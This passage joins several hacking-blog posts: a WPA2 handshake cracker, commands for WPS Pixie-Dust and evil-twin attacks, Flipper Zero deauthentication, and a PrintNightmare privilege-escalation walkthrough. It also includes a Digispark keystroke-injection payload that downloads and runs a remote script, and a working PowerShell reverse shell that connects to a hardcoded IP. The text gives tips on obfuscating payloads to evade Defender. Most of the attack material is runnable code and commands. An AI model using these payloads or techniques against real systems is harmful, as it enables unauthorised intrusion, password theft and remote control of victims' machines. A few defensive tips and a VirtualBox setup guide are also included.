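    """Constructed EAPOL-Key message 2 of 4: the client's frame carrying SNonce and MIC."""
    body = (b"\x02"                  # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"            # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"            # key length 16
            + b"\x00" * 7 + b"\x01"  # replay counter 1
            + snonce                 # key nonce = SNonce
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID
            + mic                    # key MIC
            + b"\x00\x00")           # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def constructed_capture() -> bytes:
    """Play the legitimate station: sign message 2 with the real passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


def crack(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes,
          eapol_frame: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """For each candidate: PMK -> PTK -> KCK -> MIC; the one that matches is the PSK."""
    snonce = eapol_frame[17:49]                      # key nonce field of message 2
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    frame = constructed_capture()
    wordlist = ["letmein", "hunter2", "password123", "correcthorse"]   # constructed
    print(crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, frame, wordlist))
```

For a real capture the same fields come out of the pcap: the AP and client MACs and ANonce from message 1, SNonce and the MIC from message 2. The 4096 PBKDF2 rounds per guess are what make this slow; hashcat mode 22000 does the same arithmetic on a GPU, which is why the only real defence is a passphrase that is not in any wordlist.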

WPS Pixie-Dust Attack

WPS, or Wi-Fi Protected Setup, is a feature of wireless access points that allows easy pairing of wireless devices. It was introduced by the Wi-Fi Alliance in 2006 and has since seen several vulnerabilities. The original one is that the 8-digit PIN is verified in two halves, which reduces an online brute force to roughly 11,000 attempts. The Pixie Dust attack (Dominique Bongard, 2014) goes further: on affected chipsets the nonces used in the WPS exchange are predictable, so the PIN can be recovered offline from a single exchange with the AP instead of being guessed online. To carry it out we first need to set our Wi-Fi adapter to monitor mode.

sudo airmon-ng start wlan0

Next, we need to use the tool wash to identify Wi-Fi access points in the area that have WPS enabled.

sudo wash -i wlan0
WPS Pixie-Dust Attack 1

Take the BSSID and the channel number from the output. Finally, run reaver to start the attack. The command below specifies the interface, BSSID and channel, adds verbosity (-vv), disables NACKs (-N), writes the exchange to a pcap file (-O) and enables the Pixie Dust attack (--pixie-dust 1, short form -K 1; newer reaver versions accept plain -K). After a few moments you should see output including the WPS PIN and the WPA PSK. Not every chipset is affected: if reaver reports that the Pixie Dust attack failed, the AP's nonces are probably not predictable and you are back to the much slower online PIN brute force, which modern APs rate-limit or lock out entirely.

sudo reaver --interface wlan0 --bssid <BSSID> --channel <CHANNEL> -vv -N -O output.pcap --pixie-dust 1
WPS Pixie-Dust Attack 2

Evil Twin Attack

An evil twin attack is one where the threat actor clones a legitimate access point (same SSID, often the same BSSID) and coerces the victim into connecting to it. Once the victim is connected, the threat actor can carry out a number of attacks, such as forcing the victim to submit their credentials to a captive portal. This type of attack can be performed using the tool wifiphisher. Once run, you will see a number of access points; select the one you want to attack.

sudo wifiphisher
Evil Twin Attack

The attack we're going to demonstrate is the captive portal attack, which asks the user for their password. Select the attack you want and the tool should start attacking the access point, deauthenticating clients and preventing them from reconnecting to the legitimate AP.

Evil Twin Attack 2

The clients should then automatically connect to the threat actor's access point and load the captive portal, which asks them for their password. The captive portal page can be customized to mimic social networking sites or even the ISP that provided the access point.

Evil Twin Attack 3

Anything submitted to the captive portal is sent to the threat actor in clear text. If the user submits their Wi-Fi password then the threat actor could now connect to the victim’s Wi-Fi and access their internal network. If they submitted their social media details then the threat actor would have that password which could be used for other online services.

Evil Twin Attack 4

Wi-Fi Hacking With Wifite

We have covered a lot of attacks, some of which have a complicated setup and use multiple tools. However, there is one tool that does almost all of them: wifite, a wrapper for the other tools we have used. It's simple to use: all you need to do is run the wifite command. Within a few seconds, you should start seeing Wi-Fi networks pop up.

sudo wifite
Wifite

When you see the network you want to attack, press Ctrl+C to stop scanning. Then input the number of the network you want to attack. Wifite will then go through each attack until it finds one that works. If you know a certain type of attack isn't going to work, it can be skipped with Ctrl+C. Finally, if the attack is successful, it should automatically crack the password and display the results.

Wifite2

Wi-Fi Hacking Conclusions

While technology is catching up to these types of attacks, your home access point may not have those features. Also, it may not be configured to protect against these attacks out of the box. You want to make sure you’re using long complex passwords not found in wordlists. This will help ensure that even if the threat actor captures the secret, they can’t crack it. Furthermore, you should disable technologies like WPS. If you need it to connect a printer, do so but then disable it after. Anyway, the real reason for this post is to try and get more eyes on the demonstration video below. Please go check it out.

Hacking Wi-Fi Networks With The Flipper Zero and Marauder

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero with Marauder to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

The Wi-Fi developer board

Installing Marauder to the Flipper Zero Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. As I'm in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero, but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Installing Marauder to the Wi-Fi Flipper Zero Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Flipper Zero Marauder install

Adding Marauder Wi-Fi Functionality To The Flipper Zero

Unfortunately, the Flipper Zero doesn't have the functionality to use the Marauder firmware out of the box. However, you can install custom firmware that contains the Marauder companion app. That is outside the scope of this post, but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you've read that, come back here and finish the article.

Marauder Flipper Zero Menu

Now that you have Marauder and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. To access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scan AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Flipper Zero Marauder Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Scanning Access Points

Listing Access Points

The next option in the list lists the access points you have just scanned. This is a convenient feature as it assigns a number to each access point, which can be used later to select the one you want to attack. The image below shows the result of running List after Scan AP: it shows the access points numbered 0 to 5, and the list scrolls on depending on how many access points were found.

Listing Access Points

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Selecting An Access Point

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the Youtube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Rick Roll Attack

Flipper Zero Marauder Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack is useful when trying to capture handshakes. A WPA/WPA2 handshake does not contain the password itself, but it does contain the nonces and a MIC computed with a key derived from the passphrase, which is enough to crack the passphrase offline and then join the network. The attack works by sending de-authentication frames, which are unauthenticated management frames, spoofed so they appear to come from the access point or from the client; the client is forced to disconnect, reconnects, and performs a fresh handshake that can be captured.

Wi-Fi De-Authentication Attack

Probe Attack

Probes are sent out by devices when they are not connected to a wireless access point. They send probe requests for access points they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests at the selected access point. I believe the desired outcome of this attack is to confuse the access point and potentially consume resources, leading to a denial of service condition. Don't quote me on that though as I'm not 100% sure and am just going off the articles I've read so far. I will update this if I get any more insight into the purpose of this attack.

Probe Attack

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options, including sniffing de-authentication packets, Pwnagotchi packets, beacon packets, ESP packets, and PMKID packets. I haven't played with the sniffing options too much, but it doesn't seem like you can run attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Sniffing

Flipper Zero Marauder Conclusions

There is a lot more to the Marauder firmware than I've covered in this post. It has the ability to sniff packets and do other things that I haven't explored yet. However, I wanted to make a post about it as there aren't many posts on it. Hopefully this gets you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you're looking to increase its functionality. I can't wait to see what other things people make.

Print Nightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I'm going to be demonstrating how to perform the PrintNightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021-1675.ps1 script by Caleb Stewart on GitHub (the script keeps the original CVE number; the flaw it exploits is the one Microsoft later reassigned as CVE-2021-34527, PrintNightmare). I've just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It's easy to see why it is such a serious vulnerability.

What Is Print Nightmare?

The vulnerability exists because the Print Spooler service (spoolsv.exe) does not properly check who is allowed to add a printer driver through its RpcAddPrinterDriverEx call: the check that should restrict driver installation to administrators can be bypassed, so an attacker can install a driver of their choosing. Because the Spooler loads the driver, the attacker's code runs with SYSTEM privileges. The same flaw is reachable remotely over RPC, which is why it made headlines as a remote code execution bug; here we use it locally to escalate.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges, which means it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the patches provided by Microsoft. The patch alone is not enough: Microsoft's guidance also requires the registry value RestrictDriverInstallationToAdministrators under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint to be set to 1, so that Point and Print cannot be used to install drivers as a non-administrator. Beyond that, disable the Spooler service on hosts that don't need to print (domain controllers in particular) and restrict network access to it on those that do.

The Scenario

A threat actor has obtained network access and a domain user's credentials, whether through phishing or some other social engineering attack. They can check whether the spooler service is exposed on the target host with the impacket-rpcdump tool. If the following protocol is included in the output, the host could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
Print Nightmare rpcdump
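Across more than one host, eyeballing rpcdump output stops scaling, so it is worth parsing. The script below is an added example, not from the original post or from impacket. It parses the endpoint-mapper listing format shown above and reports the TCP bindings for the MS-RPRN interface, which is the interface the PrintNightmare exploit talks to. SAMPLE is constructed: the first record is the page's snippet, the second is a made-up local-only interface included for contrast.

```python
"""Triage of impacket-rpcdump output for an exposed Print Spooler (MS-RPRN).

Added example, not from the original post or from impacket. It parses the
endpoint-mapper listing format shown above and reports the TCP bindings for
the MS-RPRN interface, which is the one the PrintNightmare exploit talks to.
SAMPLE is constructed: the first record is the page's snippet, the second is a
made-up local-only interface included for contrast.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

MS_RPRN_UUID = "12345678-1234-abcd-ef00-0123456789ab"   # [MS-RPRN] interface UUID

SAMPLE = """\
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]

Protocol: N/A 
Provider: N/A 
UUID    : 0a0a0a0a-0a0a-0a0a-0a0a-0a0a0a0a0a0a v1.0 
Bindings: 
          ncalrpc:[constructed-local-only-endpoint]

"""


@dataclass
class Endpoint:
    protocol: str
    provider: str
    uuid: str
    bindings: List[str] = field(default_factory=list)


def parse_rpcdump(text: str) -> List[Endpoint]:
    """Split the listing into records: key/value header lines, then indented bindings."""
    endpoints: List[Endpoint] = []
    fields: Dict[str, str] = {}
    bindings: List[str] = []

    def flush() -> None:
        if "uuid" in fields:
            endpoints.append(Endpoint(fields.get("protocol", ""),
                                      fields.get("provider", ""),
                                      fields["uuid"], list(bindings)))
        fields.clear()
        bindings.clear()

    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:                       # blank line ends a record
            flush()
            continue
        m = re.match(r"^(Protocol|Provider|UUID)\s*:\s*(.*)$", line)
        if m:
            key, value = m.group(1).lower(), m.group(2).strip()
            if key == "uuid":
                value = value.split()[0].lower()    # drop the " v1.0" version suffix
            fields[key] = value
        elif line[0] in " \t":             # indented lines are the bindings list
            bindings.append(line.strip())
    flush()
    return endpoints


def spooler_tcp_bindings(endpoints: List[Endpoint]) -> List[str]:
    """TCP endpoints of MS-RPRN: spoolsv.exe is running and reachable over RPC."""
    return [b for ep in endpoints if ep.uuid == MS_RPRN_UUID
            for b in ep.bindings if b.startswith("ncacn_ip_tcp:")]


if __name__ == "__main__":
    for binding in spooler_tcp_bindings(parse_rpcdump(SAMPLE)):
        print("Spooler exposed:", binding)
```

Treat the result as a candidate list, not a vulnerability scan: rpcdump only proves the spooler is listening, and whether RpcAddPrinterDriverEx still accepts a driver from a non-administrator depends on the patch level and the Point and Print policy. The spooler is also reachable over the SMB named pipe \pipe\spoolss, so the absence of a tcp binding does not mean the service is absent.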

The PrintNightmare Payload

To leverage this vulnerability to elevate privileges, we first need a payload that exploits it. Such an exploit is publicly available on GitHub right now at the following URL: https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25-- https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’
CVE-2021-1675.ps1.1 100%[============================================================================>] 174.38K --.-KB/s in 0.03s
2023-03-17 18:04:26 (4.96 MB/s) - 'CVE-2021-1675.ps1.1' saved [178561/178561]
Print Nightmare wget payload

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host as the user tony, whose password is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and my local scripts directory with the ‘-s’ flag; anything in that directory can later be loaded into the remote PowerShell session just by typing its file name.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
Evil WinRM

The Print Nightmare Exploit

We can now load the script that we saved to our scripts directory earlier by typing the script name (CVE-2021-1675.ps1). Evil-WinRM reads it from the local ‘-s’ directory and loads it into the remote PowerShell session, which is why ‘menu’ now lists additional functions, including ‘Invoke-Nightmare’. Running ‘Invoke-Nightmare’ writes a DLL into the user’s Temp directory and registers it as a printer driver; the spooler loads that DLL as SYSTEM, and the default payload creates a new local user and adds it to the local Administrators group. The defaults (adm1n / P@ssw0rd) are well known, so on a real engagement use the script’s -NewUser and -NewPassword parameters instead.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu
,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type
[+] Dll-Loader
[+] Donut-Loader
[+] field
[+] func
[+] get_nightmare_dll
[+] Invoke-Binary
[+] Invoke-Nightmare
[+] New-InMemoryModule
[+] psenum
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Print Nightmare EvilWinRm

The Print Nightmare Consequence

We are now able to connect to the target system as the new user. As you can see from the output below, the new user is a member of the local Administrators group (‘net localgroup’ fails with error 1312 in this session, so ‘whoami /groups’ is used to confirm membership instead), and the ‘High Mandatory Level’ label shows the session is elevated. From here we could install persistence or dump LSASS to recover credentials from memory. If a Domain Administrator has logged in to this system, their cached credentials would make it game over for the domain.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.

*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents>
Whoami

Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

The Digispark The DIY USB Rubber Ducky

Hello World and welcome to haxez. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, if you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json
Digispark Additional Boards Manager URLs

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases
Digispark Drivers

Digispark USB Rubber Ducky Payloads

Now that your Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a fork bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the PowerShell reverse shell downloader. You can see from the sketch below that this is a fairly simple script. It starts by sending the Windows key and R to the computer, which opens the Run dialog. After a brief delay, it types ‘powershell.exe’ into the Run dialog and sends the Enter key, spawning a new PowerShell window. In that window it types a command to download a second-stage script from a URL and, after another brief delay, runs it. The fixed delays are the fragile part: if the target is slow to open PowerShell, keystrokes land in the wrong window, so tune them for the hardware you are testing against. Also note that Windows clients ship with the Restricted execution policy, which blocks running ‘.ps1’ files, so on a stock machine the final step fails unless that policy has been relaxed.

// This script downloads and executes a PowerShell script, effectively opening up a reverse shell in less than 3 seconds.
// Credits to Hak5 and samratashok (developer of the Nishang framework).
#include "DigiKeyboard.h"

void setup() {
}

void loop() {
  // Send an empty keystroke first so the host has registered the keyboard before real input arrives.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  // Win+R opens the Run dialog.
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Second stage: fetch the reverse shell from a server you control, then run it.
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /* Stops the Digispark from running the script again */
  }
}

USB Rubber Ducky Powershell Reverse Shell Payload

Please note that the following PowerShell script will probably be caught by Windows Defender. With some tinkering, such as renaming variables and obfuscating the code, it may not be detected, but I won’t be attempting that in this walkthrough. The script is a reverse shell that connects back to the IP address and port that you specify, reads commands from the socket, runs them with Invoke-Expression and writes the output back. It needs to be uploaded to a server that you control, and the location of the script then needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. Paste your code into the Arduino IDE and click the upload button. A terminal at the bottom of the application will prompt you to plug in the device; the Digispark’s bootloader only accepts an upload during the first few seconds after it is plugged in, which is why the IDE asks for it in this order. Plug in the Digispark now. Once the terminal reads 100%, the board resets and the payload executes immediately against the machine it is plugged into, so don’t test with a payload that could damage your own computer.

Upload Payload To Digispark

Digispark USB Rubber Ducky Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell script to your web server and that the URL in the downloader payload points at it. Then start a netcat listener (or another listener of your choice) on your attack machine, the machine you want the shell to connect back to, on the port hard-coded in the reverse shell, and plug the Digispark into the target machine. As mentioned previously, this will only work with Defender disabled unless you have modified your payload. Please see the video below for a demonstration.

Kali Linux Virtual Machine Shared Folder

Hello world, welcome to haxez where today I want to talk about creating a Kali Linux shared folder for your Virtual Machine. Shared folders are a useful feature that lets you share files between your base operating system and your Virtual Machine. Virtual Machines do have a bidirectional clipboard for copying to and from each machine, but a shared folder gives easy access to larger resources such as wordlists. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine. Like the shared clipboard, shared folders depend on the VirtualBox Guest Additions being installed in the guest.

Creating A Kali Shared Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Creating A Shared Folder

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Adding A Shared Folder

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

The Folder Path option lets you select where on your base operating system the folder lives. Folder Name is the name the share is given inside the Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory, so leave it unticked if you want to modify your files. Auto-mount ensures that the folder is mounted when the Virtual Machine boots; you want to enable this option. Mount Point specifies where on the Virtual Machine you want it mounted. If you leave this empty, VirtualBox auto-mounts the share under /media as /media/sf_<Folder Name>.

Shared Folder Settings

Accessing Kali Shared Folder

With the settings saved, boot your Virtual Machine and log in to the desktop environment. Then launch your file manager. On the left-hand side, you should see a Devices section containing your File System and your shared folder. If not, it could be that you haven’t installed the VirtualBox Guest Additions.

File Manager

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. VirtualBox mounts the share owned by root and the vboxsf group, so your user needs to be a member of that group. Add yourself with the following command.

sudo adduser $USER vboxsf

The new group membership only applies to sessions started after the change, so log out and back in (or reboot) before trying the folder again. You should then be able to access the shared folder.
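A quick way to work out which of the three usual causes applies (no guest module, nothing mounted, or missing group membership), as an added example rather than something from the original post. It reads the kernel’s own module and mount tables and assumes nothing beyond a standard Kali guest; the helper names are my own.

```shell
#!/usr/bin/env bash
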